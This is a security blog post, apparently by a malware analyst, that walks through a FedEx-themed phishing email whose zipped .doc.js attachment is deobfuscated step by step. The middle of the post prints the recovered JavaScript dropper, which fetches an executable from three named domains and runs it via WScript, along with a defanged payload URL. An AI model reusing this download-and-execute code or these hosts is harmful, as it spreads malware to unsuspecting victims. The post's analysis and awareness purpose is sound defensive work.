Something Phishy

by Destruct_Icon
Categories: Analysis, Coding, JavaScript
Tags: , , ,
Comments: Leave a Comment


:Something Phishy – Files in Files:

Happy new year everyone! This is Destruct_Icon and one of the things I’d like to start doing this year is writing information about some of the phishing e-mails that come in as posts dubbed “Something Phishy”. I have a few e-mail boxes that get hammered by phishing e-mails but this first one will be a bit of a treat as it came in straight to our @malwerewolf.com address. Although this is fairly old,  in this first post I’d like to go through some of the first stages and show what we were able to pull of this campaign.

diphishy1Looks like one of my parcels have shipped! Good thing Earl Chapman was kind enough to send me the shipping label in the form of an attached zip file. Well, since I was raised to never speak to strangers, let me take a look at the headers of the e-mail and find out who is trying to speak to me.diphishy2




Alright Magee Corporate Solutions, why are you sending me a fedex post? Their websites says they are “Connecting Success With Your Future”. Maybe that means this file will give me success! Let’s dive in. Instead of doing this the simple way, how about we pull the file down through the source and then go through the motions of converting it to something we can poke at.


Dumping this into a file named base64. Now using a SIFT/Remnux installation, I decoded the file and dropped it into cows. That’s right, cows.


PK FIRE! Alright this isn’t a Ness file. This is an archive that appears to have something called label_*.doc.js. Let’s unzip it and figure out just what that .doc.js file is.


Don’t know about you but I think whoever made this JS had some love for Dragonball because everything was being appended to the variable SSJ. Let’s first use js-beautify and see what we’re dealing with.


We see some of the buzz words like “GET”, “VAR” and “Math” which leads me to believe that this is just some obfuscation if it wasn’t already obvious enough. I launched firebug and let it build out the variable and we start getting a clearer picture.


Well that’s pretty. SSJ builds out the function so let’s copy that out and beautify it.

function dl(fr) {
    var b = "www.dominaeweb.com lincolnracing.com alejandrosanchezvejar.com".split(" ");
    for (var i = 0; i < b.length; i++) {
        var ws = WScript.CreateObject("WScript.Shell");
        var fn = WScript.ScriptFullName + "." + Math.round(Math.random() * 100000) + ".exe";
        var dn = 0;
        var xo = WScript.CreateObject("MSXML2.XMLHTTP");
        xo.onreadystatechange = function() {
            if (xo.readyState == 4 && xo.status == 200) {
                var xa = WScript.CreateObject("ADODB.Stream");
                xa.type = 1;
                if (xa.size > 5000) {
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn, 2);
                    try {
                        ws.Run(fn, 1, 0);
                    } catch (er) {};
        try {
            xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + str, false);
        } catch (er) {};
        if (dn == 1) break;

Time to analyze.

  • We have the domains which are in line 2 : “www.dominaeweb.com lincolnracing.com alejandrosanchezvejar.com”
  • Line 5 appears to be staging the object the data is going to be dumped in : var fn = WScript.ScriptFullName + “.” + Math.round(Math.random() * 100000) + “.exe”;
  • Line 26 and 27 creates the GET request and initiates the pull but where is it going?
    • http://” + b[i] + “/document.php?rnd=” + fr + “&id=” + str
      • We have the most of the information here at our fingertips. b is from line 2 and iterates through each domain.
      • fr is a bit complicated as it’s not referenced until the function is called. These are at the bottom of the script on lines 32, 33 and 34. You will see that dl(4841) is the first one attempted.
      • Now str. Where’s str? It’s not in this little block of text. But looking back at the code, we see that str was defined at the very beginning where all of the obfuscation started. I pulled this out of firebug as it was the only other variable with legitimate data in it : 5551555E00011710161107103B0D070B0A2409050813011601130B08024A070B095E225E0905030101070B16140B16051001170B0811100D0B0A174A070B095E17011614565E555050575D50545256505E56
    • We should have our full URL now : hxxp://www[.]dominaeweb[.]com/document.php?rnd=4841&id=5551555E00011710161107103B0D070B0A2409050813011601130B08024A070B095E225E0905030101070B16140B16051001170B0811100D0B0A174A070B095E17011614565E555050575D50545256505E56

I did some quick triage of the executable and found some of the following information but I didn’t go too far down the rabbit hole.

  • Temp directory|AppData\Local\Temp| U s e r s \ a d m i n \ A p p D a t a \ L o c a l \ T e m p \ y e n i . e x e
  • |Dictionary / password|TEST| y e n i . e x e T E S T X9@ 9@ H

The ViruaTotal scanners had 27 hits mostly identifying the malware as Gen:Variant.Symmi. The lessons learned of this is nothing particularly new. We have seen many phishing campaigns use Fedex_* or Label_* attachments. I have seen DOC*, PDF, XLS*, GIF*, VBS* and others. I felt it was necessary posting about this one as it was the first time I’ve seen a .JS file directly as the infection vector in the Fedex and Label campaigns. I don’t get to spend a lot of time looking at these things so it could have been used many times but if there is anything new in this and you have some questions, please contact me! I’d love to chat. I like long walks on the beach during a full moon on a rainy evening : destruct_icon@malwerewolf.com.

Leave a Reply

Your email address will not be published. Required fields are marked *

Today is Monday